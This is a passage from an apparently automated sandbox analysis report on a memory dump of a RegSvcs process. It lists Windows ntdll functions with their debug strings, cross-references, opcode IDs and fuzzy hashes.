                                                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 014D2180
                                                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 014D2178
                                                                                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 014D219F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                              • API String ID: 0-861424205
                                                                                                                              • Opcode ID: 39e2f5a99e7fb99031ffb25347d51300679dbba940576c0af15ad4ba9840904d
                                                                                                                              • Instruction ID: f98f8eb2c1fc5165d07e5d29ab7b8a8c53ccaccb60ba47f1d56dd947efe8f90b
                                                                                                                              • Opcode Fuzzy Hash: 39e2f5a99e7fb99031ffb25347d51300679dbba940576c0af15ad4ba9840904d
                                                                                                                              • Instruction Fuzzy Hash: A9313736B4021577FF218AAA9C41F5F7E68DBA5A41F05405FFA04BB230D3B09E02C6A1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0149C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 014D81E5
                                                                                                                              • LdrpInitializeImportRedirection, xrefs: 014D8177, 014D81EB
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0149C6C3
                                                                                                                              • LdrpInitializeProcess, xrefs: 0149C6C4
                                                                                                                              • Loading import redirection DLL: '%wZ', xrefs: 014D8170
                                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 014D8181, 014D81F5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                              • API String ID: 0-475462383
                                                                                                                              • Opcode ID: 6ee8b4992e9ec9682ade2d37ce5591bf79bc29168bb267fe700dba836cb15b54
                                                                                                                              • Instruction ID: 53a17b333c1e43d5705a8d2c1dc9691a87db1ed9634a6adb02261e8f5ee2e538
                                                                                                                              • Opcode Fuzzy Hash: 6ee8b4992e9ec9682ade2d37ce5591bf79bc29168bb267fe700dba836cb15b54
                                                                                                                              • Instruction Fuzzy Hash: 203115716443069BD710EF2ADC45E2ABBD1AFA4B10F05051EF9446B2B1D630EC04C7A2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014A096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 014A2DF0: LdrInitializeThunk.NTDLL ref: 014A2DFA
                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014A0BA3
                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014A0BB6
                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014A0D60
                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014A0D74
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1404860816-0
                                                                                                                              • Opcode ID: 80ad829c096735aec9e7cf6295e1b40c7fe80f26da176ffa200cb575d8e2a6a0
                                                                                                                              • Instruction ID: 8c0bed5839527321b85b2bb3bd97cf99645feee92e220540518cd00bdd6c2208
                                                                                                                              • Opcode Fuzzy Hash: 80ad829c096735aec9e7cf6295e1b40c7fe80f26da176ffa200cb575d8e2a6a0
                                                                                                                              • Instruction Fuzzy Hash: FC426B71900705DFDB21CF28C890BAAB7F4BF14314F4585AAE989EB351E770AA85CF61
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014729A0 Relevance: 6.0, Strings: 4, Instructions: 966COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: $HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                              • API String ID: 0-3126994380
                                                                                                                              • Opcode ID: 65c4ad25caaf1c2ec6a3162080524a31738d1a3a882cdb11804c6b23a6099332
                                                                                                                              • Instruction ID: d458bf333d4fb28495021f075df66acf45c5a3e4902166d02ee6dbffa5804320
                                                                                                                              • Opcode Fuzzy Hash: 65c4ad25caaf1c2ec6a3162080524a31738d1a3a882cdb11804c6b23a6099332
                                                                                                                              • Instruction Fuzzy Hash: 3692CC71A042499FDB25CF68C440BEEBBF1FF48300F18845AE899AB362D774A946DF50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0146A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                              • API String ID: 0-379654539
                                                                                                                              • Opcode ID: 808d2b106ddb9752a557256733bf06bc6a46e5bae7944e2b7152409f333a8abc
                                                                                                                              • Instruction ID: 6cfdd3bf53c57f47f47e414cb5bb55b989087353581e8604280a835d431251e0
                                                                                                                              • Opcode Fuzzy Hash: 808d2b106ddb9752a557256733bf06bc6a46e5bae7944e2b7152409f333a8abc
                                                                                                                              • Instruction Fuzzy Hash: D6C18774108B828BD711CF58C544B6AB7E8BF94708F10486FF996AB361E374C94ACB53
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01498402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01498421
                                                                                                                              • LdrpInitializeProcess, xrefs: 01498422
                                                                                                                              • @, xrefs: 01498591
                                                                                                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0149855E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-1918872054
                                                                                                                              • Opcode ID: c90a563027a6130713e103c15e5a0ec6d4babb124166f4ca0ed35894166af3a8
                                                                                                                              • Instruction ID: faf968c33d6002175afbdceaa9a695d561b5d75ef86df5b8b241f1c642130e86
                                                                                                                              • Opcode Fuzzy Hash: c90a563027a6130713e103c15e5a0ec6d4babb124166f4ca0ed35894166af3a8
                                                                                                                              • Instruction Fuzzy Hash: 8591C071508346AFDB21DF69CC50FABBAE8BFA4754F40082FF68496121E730D908CB52
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0149273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 014D21DE
                                                                                                                              • .Local, xrefs: 014928D8
                                                                                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 014D21D9, 014D22B1
                                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 014D22B6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                              • API String ID: 0-1239276146
                                                                                                                              • Opcode ID: 8d94ff2c33f2d8a691d6bcaf917bb12f6e49f284da4186fe78554bbcdb3d6680
                                                                                                                              • Instruction ID: 04fe8a39e9cf950a1d5422c10e859586b6d5d6288763dd6fde0f851aad6b3c93
                                                                                                                              • Opcode Fuzzy Hash: 8d94ff2c33f2d8a691d6bcaf917bb12f6e49f284da4186fe78554bbcdb3d6680
                                                                                                                              • Instruction Fuzzy Hash: B4A19231A40229AFDF24CF59D884B9AB7B1BF58354F1541EBE908AB361D7709E81CF90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01494AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • RtlDeactivateActivationContext, xrefs: 014D3425, 014D3432, 014D3451
                                                                                                                              • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 014D3437
                                                                                                                              • SXS: %s() called with invalid flags 0x%08lx, xrefs: 014D342A
                                                                                                                              • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 014D3456
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                              • API String ID: 0-1245972979
                                                                                                                              • Opcode ID: 653a917a091a4532c1dc1c00f136ad9d61e134d535cc38d3e80b979286bf07e7
                                                                                                                              • Instruction ID: 974b915af1f925be5446aa038c21fdeff143f5b65dd992a8ad9b06164528dbb3
                                                                                                                              • Opcode Fuzzy Hash: 653a917a091a4532c1dc1c00f136ad9d61e134d535cc38d3e80b979286bf07e7
                                                                                                                              • Instruction Fuzzy Hash: E76125726407029FDF22CF19C951B2BBBE4AF90B10F19852FE9559B360D734E802CB92
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014664AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 014C106B
                                                                                                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 014C1028
                                                                                                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 014C10AE
                                                                                                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 014C0FE5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                              • API String ID: 0-1468400865
                                                                                                                              • Opcode ID: d1957b35d4c5f7bcdf813f339f6633225f657adcc0c63249c0de3bc392d7fbe5
                                                                                                                              • Instruction ID: bb4997a24014b075a01959d2582804f22dd9d64eea164f83a84fc979ee9873d4
                                                                                                                              • Opcode Fuzzy Hash: d1957b35d4c5f7bcdf813f339f6633225f657adcc0c63249c0de3bc392d7fbe5
                                                                                                                              • Instruction Fuzzy Hash: E371F1B19043469FCB60DF15C885B9B7FACAFA4768F41046EF9488B266D334D588CBD2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0148245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • LdrpDynamicShimModule, xrefs: 014CA998
                                                                                                                              • apphelp.dll, xrefs: 01482462
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 014CA9A2
                                                                                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 014CA992
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-176724104
                                                                                                                              • Opcode ID: b12b1ca09dfd1de5ca3bd5c2aacd857f79e1ca8c07b8b841f53afcb936ae7c0b
                                                                                                                              • Instruction ID: 403ea694d01ee7f322710deefaca31360852b31326e2a05e57daff460575a1d3
                                                                                                                              • Opcode Fuzzy Hash: b12b1ca09dfd1de5ca3bd5c2aacd857f79e1ca8c07b8b841f53afcb936ae7c0b
                                                                                                                              • Instruction Fuzzy Hash: 40313779600306ABDB719F5D9855EAABBB4FB80F04F26001FE8106B375E7B05986D790
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01470770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                              • API String ID: 0-4253913091
                                                                                                                              • Opcode ID: c1eb7e5fdec4fb23c28504a1856a7a4109bcea9f1a7831cdefb2926a1da89389
                                                                                                                              • Instruction ID: 307b3bc226a0fb75bb14093017900f282a8ef2d6a6c99f30efa2a49905f28a25
                                                                                                                              • Opcode Fuzzy Hash: c1eb7e5fdec4fb23c28504a1856a7a4109bcea9f1a7831cdefb2926a1da89389
                                                                                                                              • Instruction Fuzzy Hash: B5F1BC74B01606DFEB25CF68C884BAAB7F5FF85700F14816AE4169B3A1D730E981CB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01486962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: $@
                                                                                                                              • API String ID: 0-1077428164
                                                                                                                              • Opcode ID: 7d8b54ee55c8988c56df93a9e0d2bc7e197a661c5e27f2e82b2a58a14950f259
                                                                                                                              • Instruction ID: 3aa8d9b0d19ae407998043c8ee4693d2c5597a4cbfadff9c5079bea46e45bbc8
                                                                                                                              • Opcode Fuzzy Hash: 7d8b54ee55c8988c56df93a9e0d2bc7e197a661c5e27f2e82b2a58a14950f259
                                                                                                                              • Instruction Fuzzy Hash: 0AC2BF716083418FE765DF29C890BAFBBE5AF88714F14892EE989C7361D734D805CB52
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0145A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                              • API String ID: 0-2779062949
                                                                                                                              • Opcode ID: 17d0283b07ac289fa61c4d2e84fc82a95931c8fbb9029b4f73566096a072a67d
                                                                                                                              • Instruction ID: 582363d74c3faa4e0eef2aeb897395c9e3e5e77a0dff451b48714c1242b2729c
                                                                                                                              • Opcode Fuzzy Hash: 17d0283b07ac289fa61c4d2e84fc82a95931c8fbb9029b4f73566096a072a67d
                                                                                                                              • Instruction Fuzzy Hash: 9BA159719112299BDB319F28CCC8BEAB7B8EF54710F1101EAE908A7261D7759F85CF60
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01480BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 014CA121
                                                                                                                              • Failed to allocated memory for shimmed module list, xrefs: 014CA10F
                                                                                                                              • LdrpCheckModule, xrefs: 014CA117
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-161242083
                                                                                                                              • Opcode ID: 4806951fdebd6c15086aaf6fcc42a218d7c4eb7551eb5b06aae40551ecadb33e
                                                                                                                              • Instruction ID: 9227164e77e59a1cbe3292737dab10680ec25a0a60539aae7457cdf0769a3402
                                                                                                                              • Opcode Fuzzy Hash: 4806951fdebd6c15086aaf6fcc42a218d7c4eb7551eb5b06aae40551ecadb33e
                                                                                                                              • Instruction Fuzzy Hash: 3571E375A10306DFDB29EF69C950AAEB7F4FB54704F15402EE412AB321E734AD4ACB40
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01470A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                              • API String ID: 0-1334570610
                                                                                                                              • Opcode ID: 38455394ee8cd7a9f30e6f59debd5729bce6fb8ace73fc239624d167f3d6295b
                                                                                                                              • Instruction ID: b1c39900deb5eaee38edc07ea4616ad0ba0e42b99b90087af66c5f1693464a8c
                                                                                                                              • Opcode Fuzzy Hash: 38455394ee8cd7a9f30e6f59debd5729bce6fb8ace73fc239624d167f3d6295b
                                                                                                                              • Instruction Fuzzy Hash: 2861AC716013029FDB29DF68C480BAABBE1FF56704F14855EE8598F3A2D770E981CB91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0149C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 014D82E8
                                                                                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 014D82DE
                                                                                                                              • Failed to reallocate the system dirs string !, xrefs: 014D82D7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-1783798831
                                                                                                                              • Opcode ID: 64d9efef4a172a0b54b39bf713ecc2492c11e9cacc96c65ec3ea1dd9ce7c108c
                                                                                                                              • Instruction ID: 79168b7ea0e6a6bfa8bdf9dbd214537e7fb6201ca22626df921874183abd83ec
                                                                                                                              • Opcode Fuzzy Hash: 64d9efef4a172a0b54b39bf713ecc2492c11e9cacc96c65ec3ea1dd9ce7c108c
                                                                                                                              • Instruction Fuzzy Hash: E141F471540302ABDB20EB69D894F5F7BE8EF58760F01492FF9589B270E770E8049BA1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0151C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • PreferredUILanguages, xrefs: 0151C212
                                                                                                                              • @, xrefs: 0151C1F1
                                                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0151C1C5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                              • API String ID: 0-2968386058
                                                                                                                              • Opcode ID: 5eaa0a751e0a127a7fb3b7287ba58d7ce634024655cdb1c282e1d6a26efdae16
                                                                                                                              • Instruction ID: da2fe7ff5e2cfe9ec3075fa52d03c700e1728766eba8ece95f8189165d0aadcd
                                                                                                                              • Opcode Fuzzy Hash: 5eaa0a751e0a127a7fb3b7287ba58d7ce634024655cdb1c282e1d6a26efdae16
                                                                                                                              • Instruction Fuzzy Hash: 9E419571D40209EBEF12DFD9C881FEEB7B8BB24700F14406AE659BB254D7759A44CB50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014F4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                              • API String ID: 0-1373925480
                                                                                                                              • Opcode ID: b89530f8d9485440ff6d9534e37fab28ab1df73ec79696b15f190d9ccb90aa38
                                                                                                                              • Instruction ID: 46b42eff0547f4737d852aa8662b9847794d86a3e2d27c55d0e8d4ff03ce1148
                                                                                                                              • Opcode Fuzzy Hash: b89530f8d9485440ff6d9534e37fab28ab1df73ec79696b15f190d9ccb90aa38
                                                                                                                              • Instruction Fuzzy Hash: 2D41D471A006598BEB25DBD9C944BAEBBB4FF65340F19046FDA01EB7A1DB348902CB11
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014E4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 014E4888
                                                                                                                              • LdrpCheckRedirection, xrefs: 014E488F
                                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 014E4899
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                              • API String ID: 0-3154609507
                                                                                                                              • Opcode ID: 437753cfb9cd3b136e8b892cc8eb0bfa3527d3e575f371a3522c18b4e96a9ecc
                                                                                                                              • Instruction ID: d32a3bb072e1d3d248404866fd18230d38c7d4185ca16f51b02a2013e41db71d
                                                                                                                              • Opcode Fuzzy Hash: 437753cfb9cd3b136e8b892cc8eb0bfa3527d3e575f371a3522c18b4e96a9ecc
                                                                                                                              • Instruction Fuzzy Hash: DF41CF36A003518BCB21CE69D848A277BE5BF89652F0A055FED98DB371D330D800CB81
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01470BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                              • API String ID: 0-2558761708
                                                                                                                              • Opcode ID: 5be0a5723972678ab70762410ae9d0f61c8a8213510b80a37eda0e9af23abb26
                                                                                                                              • Instruction ID: 1ca14e0ebe93759f88e13986021a183b5d31496963942da3505ac5e9956e97d4
                                                                                                                              • Opcode Fuzzy Hash: 5be0a5723972678ab70762410ae9d0f61c8a8213510b80a37eda0e9af23abb26
                                                                                                                              • Instruction Fuzzy Hash: 0A119D313161429FDB69CA19C451BBAF3A5EF52A15F28816FF806CF272DB30E841C755
                                                                                                                              Uniqueness

